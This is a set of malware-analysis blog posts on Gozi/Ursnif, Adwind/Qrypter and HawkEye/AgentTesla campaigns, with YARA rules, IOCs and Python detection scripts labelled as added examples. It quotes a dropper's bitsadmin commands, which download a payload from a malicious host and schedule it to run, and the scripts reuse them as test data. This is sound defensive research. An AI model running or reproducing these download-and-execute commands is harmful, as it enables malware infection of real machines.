Saturday, November 24, 2018

Hunting malware in memory. A Gozi case.

Some of the actors using Gozi / Ursnif take advantage of compromised emails (BEC) to deliver weaponised Microsoft Office documents. This is not new at all; however, in the last week I've seen an increase in such attacks. In recent campaigns, the Office document contains a macro which spawns cmd.exe, which in turn executes PowerShell to download the payload.



This can be easily detected with any endpoint use case that monitors processes and their parent processes.

Also, Gozi can be easily detected via its registry keys, as the malware itself is stored there.


The payload dropped by this Gozi version executes a rather unique PowerShell command in order to persist via the registry key, which can be easily hunted:
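The two detection ideas above (a parent/child chain of Office application, cmd.exe and PowerShell, and a PowerShell command line that pulls its payload out of the registry) can be expressed as a small hunt over Sysmon-style process creation events. The following is an added example and not code from the original post; the events, paths, the example.invalid URL and the HKCU:\Software\Example key are constructed for illustration, not taken from a Gozi sample.

```python
import re

# Constructed Sysmon-style process creation events (Event ID 1 fields only).
# pid/ppid link each process to its parent.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 1220, "ppid": 400,
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\user\\Downloads\\invoice.doc"'},
    {"pid": 1300, "ppid": 1220, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -w hidden -nop -c (New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/payload',"
                "'C:\\Users\\user\\AppData\\Local\\Temp\\p.exe')"},
    {"pid": 1316, "ppid": 1300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -c (New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/payload',"
                "'C:\\Users\\user\\AppData\\Local\\Temp\\p.exe')"},
    # Constructed registry-stored payload pattern: PowerShell reads a value
    # from a registry key and hands it to Invoke-Expression (iex).
    {"pid": 1500, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c iex (Get-ItemProperty "
                "HKCU:\\Software\\Example).Main"},
    # Benign: an admin opening cmd and then PowerShell from Explorer.
    {"pid": 2000, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 2010, "ppid": 2000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Image names from the given process up through its ancestors."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_office_shell_chains(events):
    """PIDs of powershell.exe launched by cmd.exe launched by an Office app."""
    hits = []
    for e in events:
        chain = lineage(events, e["pid"])
        if (len(chain) >= 3 and chain[0] == "powershell.exe"
                and chain[1] == "cmd.exe" and chain[2] in OFFICE_APPS):
            hits.append(e["pid"])
    return hits


# Registry read cmdlets (Get-ItemProperty and its alias gp) combined with
# Invoke-Expression: the generic shape of a registry-stored payload launcher.
REG_READ = re.compile(r"Get-ItemProperty|\bgp\b", re.I)
IEX = re.compile(r"\biex\b|Invoke-Expression", re.I)


def find_registry_payload_execution(events):
    """PIDs of powershell.exe whose command line reads the registry and IEXes it."""
    return [e["pid"] for e in events
            if basename(e["image"]) == "powershell.exe"
            and REG_READ.search(e["cmdline"]) and IEX.search(e["cmdline"])]


if __name__ == "__main__":
    print("office -> cmd -> powershell:", find_office_shell_chains(SAMPLE_EVENTS))
    print("registry payload execution:", find_registry_payload_execution(SAMPLE_EVENTS))
```

The lineage check walks the parent chain rather than looking only at the direct parent, so a macro that inserts an extra hop (cmd.exe here) still lands on the Office application as the grandparent; the benign Explorer-launched cmd/PowerShell pair in the sample is not flagged.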



Some endpoint solutions have the capability to run searches against YARA rules. In some cases the searches can cover running processes, live memory and specific files within a given folder. A good example is the open source project malscan, which permits scanning processes in memory. This is a really interesting way to detect malware on endpoints.

For details on how Gozi works, there is a good post from Vitali Kremez explaining how recent versions of Gozi work. In essence, Gozi injects a DLL (client.dll) into the explorer.exe process, so it is possible to hunt for the C2 URL strings in this process. I already extracted the C2 URL strings in a past blog entry.



rule gozi_C2_memory {
    meta:
        description = "Gozi C2 memory"
        author = "@Angelill0 - Angel Alonso Parrizas"
        date = "2018-11-19"

    strings:
        $s1 = /soft=\S+&version=\S+&user=\S+&server=\S+&id=\S+/  // Gozi V2
        $s2 = /soft=\S+&user=\S+&server=\S+&id=\S+/              // Gozi V2
        $s3 = /soft=\S+&version=\S+&user=\S+&group=\S+&id=\S+/   // Gozi V3

    condition:
        $s1 or $s2 or $s3
}



Running the YARA rule against an infected system, it is possible to detect the C2 in memory:
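For readers without a YARA-capable endpoint agent, the same three patterns can be run over a process memory dump with plain Python. This is an added example, not code from the post or from malscan; the memory buffer below is constructed (two beacon-style query strings among NUL bytes), and the version and id values in it are made up. It goes one step beyond the rule by extracting the beacon fields from each hit.

```python
import re

# The three regexes from the YARA rule above, as byte patterns so they can run
# over raw memory. Most specific first: the short V2 pattern is a subset of the
# long one because \S+ happily matches '&' and '='.
PATTERNS = [
    ("gozi_v3", re.compile(rb"soft=\S+&version=\S+&user=\S+&group=\S+&id=\S+")),
    ("gozi_v2_long", re.compile(rb"soft=\S+&version=\S+&user=\S+&server=\S+&id=\S+")),
    ("gozi_v2_short", re.compile(rb"soft=\S+&user=\S+&server=\S+&id=\S+")),
]

# Runs of printable ASCII, the same thing `strings` extracts. Scanning these
# rather than the raw buffer matters because \S also matches NUL bytes, so the
# greedy \S+ would otherwise run across string boundaries into unrelated data.
PRINTABLE = re.compile(rb"[\x20-\x7e]{8,}")

# Constructed memory dump (not a real explorer.exe dump).
SAMPLE_MEMORY = (
    b"\x00" * 16 + b"GET /images/ HTTP/1.1\x00"
    + b"soft=1&version=217116&user=0a1b2c3d4e5f6a7b&server=12&id=1049&crc=1\x00"
    + b"\x00" * 8
    + b"soft=3&version=300613&user=11112222aaaabbbb&group=2029&id=4100\x00"
    + b"\x00" * 8
)


def scan_memory(buf):
    """Return (rule label, offset, matched bytes) for each printable string that matches."""
    hits = []
    for s in PRINTABLE.finditer(buf):
        chunk = s.group(0)
        for label, rx in PATTERNS:
            m = rx.search(chunk)
            if m:
                hits.append((label, s.start() + m.start(), m.group(0)))
                break  # the most specific pattern wins for this string
    return hits


def parse_beacon(matched):
    """Split a matched beacon query string into its key/value fields."""
    fields = {}
    for part in matched.split(b"&"):
        key, _, value = part.partition(b"=")
        fields[key.decode("ascii", "replace")] = value.decode("ascii", "replace")
    return fields


def hunt(buf):
    """One dict per hit: which rule fired, where, and the parsed beacon fields."""
    return [{"rule": label, "offset": off, "fields": parse_beacon(m)}
            for label, off, m in scan_memory(buf)]


if __name__ == "__main__":
    for h in hunt(SAMPLE_MEMORY):
        print(h["rule"], hex(h["offset"]), h["fields"])
```

To use it on a live system, read the target process memory into `buf` (for example from a dump file, or region by region from /proc/<pid>/mem on Linux) and call `hunt(buf)`; the offsets returned are relative to the buffer you passed.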





Monday, August 6, 2018

Gozi malspam campaign mimicking Swisscom on 30th July 2018

A few days ago GovCERT.ch reported via Twitter a malspam campaign mimicking Swisscom invoices.



The malware delivered in the last stage was Gozi / Ursnif, but let's analyse this campaign a bit.

The malspam campaign is based on e-mails mimicking invoices from the telco Swisscom, with an HTTP link to a ZIP file. The ZIP file contains an obfuscated Visual Basic Script (VBS):



The VBS was not detected by many AVs:



The script executed the following commands:


C:\Windows\System32\cmd.exe' /c bitsadmin /transfer mxs5 https://bestouters.com/online/docker.php2 C:\Users\user~1\AppData\Local\Temp/JZCzDJTTgS.exe &

bitsadmin /create /download IUII &bitsadmin /addfile IUII https://bestouters.com/online/index.php C:\Users\user~1\AppData\Local\Temp/oXzEXmPNy.txt &

bitsadmin /setcustomheaders IUII User-Agent:STARLEX &

bitsadmin /resume IUII &bitsadmin /complete IUII &

schtasks /create /st 17:10 /sc once /tn sw3 /tr C:\Users\user~1\AppData\Local\Temp/JZCzDJTTgS.exe

It is interesting to see how the 'bitsadmin' command is used to drop the payload from "https://bestouters.com/online/docker.php". This technique is well known to be used by malware, so monitoring this process, for example via Sysmon, is a must.
Also, the fact that the user agent is set to "STARLEX" makes this campaign unique; however, looking at the network traffic, it seems that this never worked and the default bitsadmin user agent was used:




In any case, monitoring the user agent, either for strange names or for "Microsoft BITS", will provide good insight into suspicious activity.
The last two steps are related to the scheduled task created via the "schtasks" command. This is a good technique to delay automated malware sandbox analysis, but it is also very easy to detect with proper detection use cases. Two things can be monitored here: the command "schtasks /create" and the fact that a binary under the "AppData" folder is called. Generally speaking, there should be no binaries executed from *AppData*, so this is also suspicious activity.
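The four use cases just described (bitsadmin downloads, a custom BITS user agent, schtasks /create, and binaries run from AppData, plus the proxy-side check for "Microsoft BITS" or odd user agents) can be checked with a few pattern rules. This is an added example and not code from the post; the command lines are the ones shown above, with one constructed benign schtasks line added, and the proxy log is a constructed tab-separated sample, not real traffic from the campaign.

```python
import re

# Command lines from the VBS above plus one constructed benign line.
SAMPLE_CMDLINES = [
    "bitsadmin /transfer mxs5 https://bestouters.com/online/docker.php2 "
    "C:\\Users\\user~1\\AppData\\Local\\Temp/JZCzDJTTgS.exe",
    "bitsadmin /create /download IUII",
    "bitsadmin /addfile IUII https://bestouters.com/online/index.php "
    "C:\\Users\\user~1\\AppData\\Local\\Temp/oXzEXmPNy.txt",
    "bitsadmin /setcustomheaders IUII User-Agent:STARLEX",
    "bitsadmin /resume IUII",
    "bitsadmin /complete IUII",
    "schtasks /create /st 17:10 /sc once /tn sw3 /tr "
    "C:\\Users\\user~1\\AppData\\Local\\Temp/JZCzDJTTgS.exe",
    "schtasks /query /tn sw3",  # constructed benign line: no /create
]

URL = re.compile(r"https?://\S+", re.I)
# A drive-letter path containing an AppData component and ending in .exe;
# both separators are accepted because the dropper mixed '\' and '/'.
APPDATA_EXE = re.compile(r"[A-Za-z]:[\\/]\S*[\\/]AppData[\\/]\S*\.exe\b", re.I)


def classify_cmdline(cmdline):
    """Names of the indicators that fire on one process command line."""
    low = cmdline.lower()
    hits = []
    if "bitsadmin" in low and ("/transfer" in low or "/addfile" in low):
        hits.append("bitsadmin_download")
    if "bitsadmin" in low and "/setcustomheaders" in low:
        hits.append("bitsadmin_custom_user_agent")
    if "schtasks" in low and "/create" in low:
        hits.append("schtasks_create")
    if APPDATA_EXE.search(cmdline):
        hits.append("exe_under_appdata")
    return hits


def scan_cmdlines(cmdlines):
    """(command line, indicators) for every line that triggers at least one rule."""
    return [(c, classify_cmdline(c)) for c in cmdlines if classify_cmdline(c)]


def extract_urls(cmdlines):
    """Download URLs seen in the command lines, in order, for blocking or pivoting."""
    return [u for c in cmdlines for u in URL.findall(c)]


# Constructed proxy log: timestamp, client, method, URL, user agent.
SAMPLE_PROXY_LOG = (
    "2018-07-30T17:05:02Z\t10.0.0.5\tGET\thttps://bestouters.com/online/docker.php2\tMicrosoft BITS/7.8\n"
    "2018-07-30T17:05:03Z\t10.0.0.5\tGET\thttps://bestouters.com/online/index.php\tMicrosoft BITS/7.8\n"
    "2018-07-30T17:05:10Z\t10.0.0.7\tGET\thttps://www.swisscom.ch/\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/68.0.3440.84 Safari/537.36\n"
    "2018-07-30T17:06:00Z\t10.0.0.9\tGET\thttp://example.invalid/\tSTARLEX\n"
)


def suspicious_user_agents(log_text):
    """(client, url, user agent) for BITS requests or user agents with no product/version token."""
    out = []
    for line in log_text.splitlines():
        _ts, client, _method, url, ua = line.split("\t", 4)
        if ua.startswith("Microsoft BITS") or not re.search(r"\S+/\d", ua):
            out.append((client, url, ua))
    return out


if __name__ == "__main__":
    for cmdline, hits in scan_cmdlines(SAMPLE_CMDLINES):
        print(hits, "<-", cmdline)
    print(extract_urls(SAMPLE_CMDLINES))
    print(suspicious_user_agents(SAMPLE_PROXY_LOG))
```

The "no product/version token" check is what catches a bare string like STARLEX without keeping a list of bad names; the "Microsoft BITS" prefix check covers the case the post observed, where the custom header was never applied and the default BITS user agent went out instead. Expect some noise from legitimate BITS jobs (Windows Update, for example), so pair it with the destination.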

Clearly, this Gozi campaign was very noisy and easy to detect with some basic use cases.

Regarding the analysis of the dropped Gozi binary, there are a couple of interesting things. First, it was signed with a valid certificate:





And this same certificate was used to sign another Gozi binary used in another campaign in another country the same day.

Secondly, it seems the malware had some debug code enabled that showed the version of the code (version 3 build 613):




The last point is that this version of Gozi/Ursnif seems to be based on the leaked ISFB source code, given that the DGA CRC matches '0x4eb7d2ca' together with the DGA base URL "http://constitution.org/usdeclar.txt":

However, this version of Gozi is not using the DGA feature; instead the C2 URL https://bybybaby.top is hardcoded:


Thursday, May 10, 2018

qthelegend: the new Qrypter for Adwind

Since last December, when I blogged about Qrypter for the first time, I've been tracking Adwind malware using this service.

@abuse.ch wrote a very interesting post about the providers hosting the C2 infrastructure that is being used by malware encrypted with Qrypter.


A few weeks ago Qrypter migrated to a new platform and doesn't use Tor any more:

The new version of Qrypter uses a Java application running locally, which encrypts the files.



In order to use the application, the user must be registered and buy a licence (credits).






I wanted to check if there is any substantial change in how the malware is encrypted with the service, so I took a look at a recent sample. The behavioural analysis doesn't really show any difference.





While debugging the malware, I can see the different Java processes executed until the final payload is decrypted and executed:



In the end, the command and control configuration is obtained the same way as with the previous Qrypter version:






During the analysis, I can see the typical Adwind behaviour: executing VB scripts to check the installed AV and local firewall, and making itself persistent via the registry:

Qthelegend, the new Qrypter, has not really changed in terms of how the malware is encrypted.

Thursday, March 15, 2018

Inside Qarallax / Adwind / Qrypter leading to Tesla / HawkEye (part 1)

A few months ago I wrote about a Java RAT named QRypter (aka QRat or Qarallax), which is basically Adwind with some layers of obfuscation. The post is here.

Usually, this RAT is used as the first stage of the infection. In a second stage, an additional payload is deployed on the victim. But before I explain this, let's take a look at the capabilities of QRypter / Adwind.


This RAT, written in Java, is multiplatform. As can be seen in the screenshot below, it is full of functionality.


The basic options give full visibility of, and control over, the victim's file system, processes, connections, etc.






But besides that, there are more advanced functionalities such as webcam capture, access via Remote Desktop, a remote console, retrieval of stored passwords, microphone capture, a keylogger, a SOCKS proxy, retrieval of wallet data, etc.


For each functionality there is a module. The modules originally come from the JBifrost malware, so clearly this is based on JBifrost.






Also, the remote console is based on JBifrost:


The remote desktop functionality also permits adding new users:






But if all these features are not enough, there is also the possibility to automatically download any additional payload once the victim connects to the C2. This allows deploying any additional payload to the victims without any interaction at the C2.

 

Actually, a lot of AgentTesla and HawkEye samples are being deployed this way.

So, let's talk a bit about AgentTesla and HawkEye.

These two malware families are very close in terms of capabilities and are used by threat actors who operate with similar TTPs.

The main goal of HawkEye and AgentTesla is to take screenshots of the victims, dump all the passwords stored in different programs (Outlook, browsers, etc.) and dump the whole history of copy & paste / keylogging done on the system. The data is exfiltrated either via HTTP or via email.

The first thing that happens after a victim is infected with HawkEye is that the threat actor receives an email informing them of a new infection. This is an "Execution Confirmed" message. Its content is quite interesting, as it contains information about the system, including the name of the file that was the infection vector, the private IP of the system, the logging time frame and the functionality enabled:






On the other hand, AgentTesla already provides some exfiltrated data, with information about the victim and screenshots, in the first email. This is the "screen capture" message:





HawkEye provides two other messages: "stealer records" and "keylog records". The first one contains password dumps, while the second one contains all the information recorded from the clipboard and a screenshot:



AgentTesla sends two additional sets of data: "Keystrokes" and "password recovered".


(To be continued)





Saturday, March 3, 2018

The strange case of Adwind embedded in a MS-DOS file

A few days ago there was a malspam campaign mimicking a bank and delivering a PDF file and some DOC files exploiting CVE-2017-11882:

The PDF file contains several images and two interesting URLs:





The first URL, http://dropboox[.]ga, is clearly a Dropbox phishing link; however, in this case it is not being used.

The other link, https://urlz[.]fr/6DWd, which is still active at the time of writing this post, redirects to http://mineralsconventionregistration[.]ca/Scann%20copy.z, which is a compressed file. In VT this file is being flagged: https://www.virustotal.com/#/file/670bca12bb20921b4689bb2651a8cc7b87840f31dbf729694027db4fb64e3296/detection





The first time I tried to detonate the file in several sandboxes it did not work, so I was interested in understanding a bit more. The file inside has a .JAR extension; however, the magic number of this file doesn't really correspond to its extension, as it is MS-DOS:




A first analysis of the file shows interesting things. The beginning of the file is an MS-DOS file:


However, it contains several more files inside:




The analysis from the previous tools doesn't seem accurate, as one of the MS-DOS files is 7.2 MB while the total file is only around 800 KB. Checking with other tools, the analysis is different; for example, with foremost the MS-DOS files don't show up:





When unzipping the .jar file, there is a warning:




I did a manual analysis of the file, and at first look I can even see some HTML, PHP and JavaScript code right after the first MS-DOS code:





When dumping the first PHP file, the content is clearly a phishing website to steal email passwords:




Then I forced my sandbox to detonate the file as a JAR file, ignoring the magic number. This worked and I could see the typical Adwind behaviour:








The connection to the jRAT C&C is 185.29.10.138:6060 (jrat138.duckdns.org). That IP is not new to me, as I have seen it linked to Qrat / Qrypter / Adwind in some analysis I did in the past.


As I said in the beginning, the file doesn't detonate in some sandboxes due to how it is built. For example, this is the analysis from HA (Hybrid Analysis) with no detonation:

https://www.hybrid-analysis.com/sample/94f087e4f03d4c109db44e9c111e8a4c500ef619ccb5a4833b283495b9ecb23e?environmentId=100
Other sandboxes detect that the extension doesn't match the magic number:





Regarding AV, it seems some of them detect the HTML at the beginning of the file as phishing, while others detect it as Adwind:




The behaviour of the DOC files is very similar. However, instead of including the URLs in a PDF file, CVE-2017-11882 is exploited to download the malicious file:




http://mineralsconventionregistration[.]ca/scan.hta

In the end, the final payload is exactly the same in both cases; however, the URL is not exactly the same:

http://mineralsconventionregistration[.]ca/scan.jar





Regardless of what the AV / sandboxes detect, and what the magic number is, when the user opens the file via Explorer, the file is executed like a normal Java file, hence the system gets infected with Adwind. It seems that the bad guys are trying to bypass some detection controls with this technique.
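The reason the file still runs as a JAR is that ZIP readers (the JVM included) locate the archive from the end-of-central-directory record at the end of the file, so anything prepended before the first local header (here an MS-DOS stub, HTML and PHP) is simply treated as leading junk, which is also what unzip warns about. A triage check should therefore not stop at the magic number. The following is an added example, not code from the post: it builds a constructed stand-in (an MZ header with filler, followed by a minimal JAR) and reports both what the first bytes claim and whether a loadable JAR is embedded.

```python
import io
import zipfile

# Constructed stand-in for the sample's leading bytes: an MZ header, the usual
# DOS stub text and some filler. Not the actual file from the post.
MZ_PREFIX = b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 64


def build_sample(prefix):
    """Build a minimal JAR (a ZIP with a manifest) with `prefix` prepended."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nMain-Class: Main\r\n")
        zf.writestr("Main.class", b"\xca\xfe\xba\xbe" + b"\x00" * 12)  # class magic + filler
    return prefix + buf.getvalue()


def sniff_magic(data):
    """What a magic-number based tool reports for the first bytes."""
    if data[:2] == b"MZ":
        return "MS-DOS executable"
    if data[:4] == b"PK\x03\x04":
        return "Zip archive (JAR)"
    return "unknown"


def embedded_jar(data):
    """If the bytes parse as a ZIP, return (offset of the first local header, entry names)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            infos = zf.infolist()
            # zipfile finds the end-of-central-directory record from the end of
            # the data and adds the length of any leading junk to header_offset,
            # so the first entry's offset tells us how much was prepended.
            return infos[0].header_offset, [i.filename for i in infos]
    except zipfile.BadZipFile:
        return None


def analyse(data):
    """Combine the magic-number view with the ZIP view and flag the mismatch."""
    magic = sniff_magic(data)
    jar = embedded_jar(data)
    return {
        "magic": magic,
        "zip_offset": None if jar is None else jar[0],
        "entries": [] if jar is None else jar[1],
        "is_jar": jar is not None and "META-INF/MANIFEST.MF" in jar[1],
        "polyglot": jar is not None and magic != "Zip archive (JAR)",
    }


if __name__ == "__main__":
    for label, data in (("mz+jar", build_sample(MZ_PREFIX)), ("plain jar", build_sample(b""))):
        print(label, analyse(data))
```

Run `analyse()` over whatever a sandbox or `file` classified as MS-DOS or unknown: a non-zero `zip_offset` together with `is_jar` is the signal that the extension, not the magic number, is what will decide how the file behaves on a double-click.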


IOCs:

http://dropboox[.]ga
185.29.10.138:6060
jrat138.duckdns[.]org
http://mineralsconventionregistration[.]ca/scan.jar
http://mineralsconventionregistration[.]ca/scan.hta
1540f31ed4c2a721771dbc452b8feeaa
a9122eb1e0345568540ae6a9e35432cc